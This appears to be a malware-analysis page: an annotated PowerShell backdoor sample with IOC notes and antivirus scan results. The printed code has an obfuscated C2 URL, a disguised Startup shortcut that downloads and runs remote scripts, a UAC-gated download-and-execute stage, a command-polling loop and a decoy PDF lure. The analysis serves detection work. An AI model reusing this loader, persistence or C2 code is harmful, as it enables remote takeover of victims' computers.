No static analysis available.
# C2 base URL. The junk token "ujkd" is stripped at runtime; after Replace()
# this is http://157.173.104.153/up/ (network IOC, plain HTTP). Every other
# function below builds its download URLs from this prefix.
$mainUri = "hujkdtujkdtujkdp:ujkd/ujkd/157.173.104.153/ujkduujkdpujkd/ujkdujkd".Replace("ujkd","");
# gid: returns a per-victim identifier (a 36-character GUID string).
# Lookup order: HKLM:\Software\Wireless\uid -> $env:public\documents\id.log
# -> a freshly generated GUID, which is appended to id.log. Nothing in the
# visible script writes the registry value, so the HKLM branch only fires if
# another stage set it.
# NOTE(review): the "{" after "function gid" and the closing braces of the
# if/else blocks are absent from this capture (lost in extraction); the
# listing is not syntactically complete as shown.
function gid
# Host-based IOC: registry key/value checked first.
$regPath = "HKLM:\Software\Wireless"
$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue
if ($null -ne $exist) {
$uid = (Get-ItemProperty $regPath -Name uid).uid
else {
# Host-based IOC: marker file in the Public profile (writable by any user).
$local = "$env:public\documents\id.log"
if (Test-Path $local) {
$uid = [IO.File]::readalltext($local)
# Only the first 36 chars are used; ">>" below appends, so the file can
# accumulate extra lines on re-runs without changing the returned id.
$uid = $uid.Substring(0,36)
else {
$uid = ([System.Guid]::NewGuid()).ToString()
$uid >> $local
return $uid
# auto: persistence. Drops a shortcut named "Google Chrome.lnk" in the
# current user's Startup folder that launches a hidden powershell.exe.
# Strings are split into fragments ("pow"+"ersh"+...) to defeat simple
# substring signatures. The closing "}" is missing from this capture.
function auto {
$dvpocj = New-Object -ComObject WScript.Shell;
$apdlzm = "\Microsoft\Windows\Start Menu\Programs\Startup\";
$begn = $env:APPDATA + $apdlzm;
# Host-based IOC:
# %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.lnk
$ryncdsf = $dvpocj.CreateShortcut("$begn"+"\Goo"+"gle "+"Ch"+"rome.ln"+"k");
$ryncdsf.TargetPath = "pow"+"ersh"+"ell.e"+"x"+"e";
# Embedded stage-2 loader. $z, $y, $x, $w and $v are assigned but never feed
# into the loader (padding/decoy). $a is a script-block string with the token
# "el" injected; after $a.replace('el','') it reads
#   {(New-Object Net.WebClient).DownloadString('http://157.173.104.153/up/bb.ps1')}
# "iex $b" performs the download and "iex $c" runs whatever bb.ps1 returned.
# Detection: a Startup .lnk whose target is powershell.exe with
# "-WindowStyle Hidden -command" is a strong signal on its own.
$ryncdsf.Arguments = " -WindowStyle Hidden -command &{`$z = 'rrjo4jn23ptjoct!tjofg!!!fjdnwp!j;4t3oi#4ftkzo4mbmpe'; `$y = 'embogjw#mb78h439gjhkfktjoct!tjofg!!!fjdn9gjhkfktjoct!tjofg!!!fjdnwp!avprlkwfaaeig5gow8e'; `$x = `$z + `$y; `$w = `$x.replace('4mbm','ring4tyopeloadring'); `$v = 'ufhyd>#ndje94o!tjoct!ttjoct!tjofg!!!fjdnwp!jofg!!!fjdnwp!'; [string] `$a = {(Neelw-Obelject Neelt.WebCellienelt).DelownloeladStrelinelg('hteltp:el//1el5el7.1el7elel3.1el0elel4.1el5el3/eluelpel/belb.pelsel1el')}; `$b=`$a.replace('el','');`$c=iex `$b;iex `$c}";
$chromePath = "$env:ProgramFiles\Google\Chrome\Application\chrome.exe"
# Cosmetic: borrow Chrome's icon so the entry passes for a browser shortcut.
$ryncdsf.IconLocation = "$chromePath,0";
# WshShortcut WindowStyle 7 = minimized.
$ryncdsf.WindowStyle = 7;
$ryncdsf.Description = "adm"+"inis"+"tra"+"tor";
$ryncdsf.WorkingDirectory = "";
$ryncdsf.Save()
# gCommand: one C2 poll. GETs <C2>/get-command.php?uid=<victim id> and, if
# the reply is non-empty, executes it. A reply containing "autoreconnect id"
# is run inline with iex; anything else is wrapped in a script block and run
# as a background job named "Command", after stopping and removing any
# previous job of that name (no -ErrorAction, so a missing job produces a
# non-terminating error). Closing braces are absent from this capture.
function gCommand {
$uid = gid
# Network IOC: GET http://157.173.104.153/up/get-command.php?uid=<GUID>
$url = $mainUri + "get-command.php?uid=$uid"
$WebClient = New-Object System.Net.WebClient
# Plain HTTP; the returned text is executed with no integrity check.
$codestring = $WebClient.DownloadString($url)
if ("" -ne $codestring) {
if ($codestring.contains("autoreconnect id")) {
iex $codestring
else {
$decode = $executioncontext.InvokeCommand.NewScriptBlock($codestring)
# Detection: a PowerShell job literally named "Command".
$JobName = "Command"
Stop-Job -Name $JobName
Remove-Job -Name $JobName
Start-Job -ScriptBlock $decode -Name $JobName
# showDoc: decoy display. Downloads <C2>/bait/<docName> into the current
# directory, opens it with the default handler (start), then deletes
# "<docName>.lnk" from the same directory. The .lnk is not created anywhere
# in this file; presumably it is the lure shortcut that launched this script
# (TODO confirm). The closing "}" is missing from this capture.
function showDoc($docName) {
# Network IOC: http://157.173.104.153/up/bait/<docName>
$url = $mainUri + "bait/$docName"
$dst = $docName
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($url,$dst)
start $dst
$lnkName = $docName + ".lnk"
Remove-Item $lnkName
# instant: UAC check gating an extra stage. After the junk tokens are
# stripped the three obfuscated strings are:
#   $rtet44gg   = HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
#   $ruiibttew  = ConsentPromptBehaviorAdmin
#   $ruiibttew2 = EnableLUA
# If either value is 0 (UAC disabled, or the admin consent prompt disabled)
# the script fetches <C2>/b.ps1 and runs it with Invoke-Expression.
# NOTE(review): the "{" after "function instant" and the closing braces are
# missing from this capture.
function instant
$rtet44gg = "Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\Wit3gjt50ndt3gjt50owt3gjt50s".Replace("t3gjt50","") + "i3bnoie4\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4".Replace("i3bnoie4","")
$ruiibttew = "Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro".Replace("y5tjogro","") + "Bu6gjoioehu6gjoioavu6gjoioiu6gjoioorAu6gjoiodmu6gjoioin".Replace("u6gjoio","")
$ruiibttew2 = "Ep8ITAwfno44jgnp8ITAwfno44jgablp8ITAwfno44jgeLp8ITAwfno44jgUp8ITAwfno44jgAp8ITAwfno44jg".Replace("p8ITAwfno44jg","")
$val = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew).$ruiibttew
$val2 = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew2).$ruiibttew2
if (($val -eq 0) -or ($val2 -eq 0)) {
# Network IOC: http://157.173.104.153/up/b.ps1 (download-and-execute).
$url = $mainUri + "b.ps1"
Invoke-Expression(New-Object System.Net.WebClient).DownloadString($url)
# action: main sequence. Shows the lure document, runs the UAC-gated stage,
# then polls the C2 every 5 seconds until a powershell.exe process exists in
# session 0 (the non-interactive services session). What spawns that process
# is not in this file; presumably b.ps1 or a C2-delivered command (TODO
# confirm). Note that auto (the Startup persistence) is never called from
# the visible code. The Set-ExecutionPolicy line is commented out in the
# original. Closing braces are missing from this capture.
function action {
#Set-ExecutionPolicy -ExecutionPolicy Bypass -Force
# Lure file name (nursing-home care theme) -- usable as a filename IOC.
showDoc "202409_Resident_Care_Quality_Improvement_Strategies_for_Nursing_Homes_Enhancing_Patient_Satisfaction_and_Health_Outcomes.pdf"
instant
$sysProc = Get-Process | Where-Object { $_.Name -eq "powershell" -and $_.SessionId -eq 0 }
# Beacon loop: gCommand each iteration, 5 s apart, until the session-0
# PowerShell appears.
while ($null -eq $sysProc) {
gCommand
Start-Sleep -Seconds 5
$sysProc = Get-Process | Where-Object { $_.Name -eq "powershell" -and $_.SessionId -eq 0 }
# Entry point: everything above only defines functions; this call starts
# the lure -> UAC check -> C2 polling chain.
action
Antivirus Signature (engine, detection name; "Clean" = not flagged by that engine — 10 of the 63 engines listed flag this sample)
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Clean
CTX Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.PowerShell.Agent
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Boxter.979.3D75295E
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.979.3D75295E
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.PZQ.Boxter.979.3D75295E
TrendMicro Clean
CMC Clean
Emsisoft Heur.BZC.PZQ.Boxter.979.3D75295E (B)
huorong Clean
FireEye Heur.BZC.PZQ.Boxter.979.3D75295E
Jiangmin Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Boxter.979.3D75295E
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Script/Wacatac.B!ml
Google Clean
AhnLab-V3 Trojan/PowerShell.Agent.SC205512
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
GData Heur.BZC.PZQ.Boxter.979.3D75295E
AVG Clean
Panda Clean
alibabacloud Clean
No IRMA results available.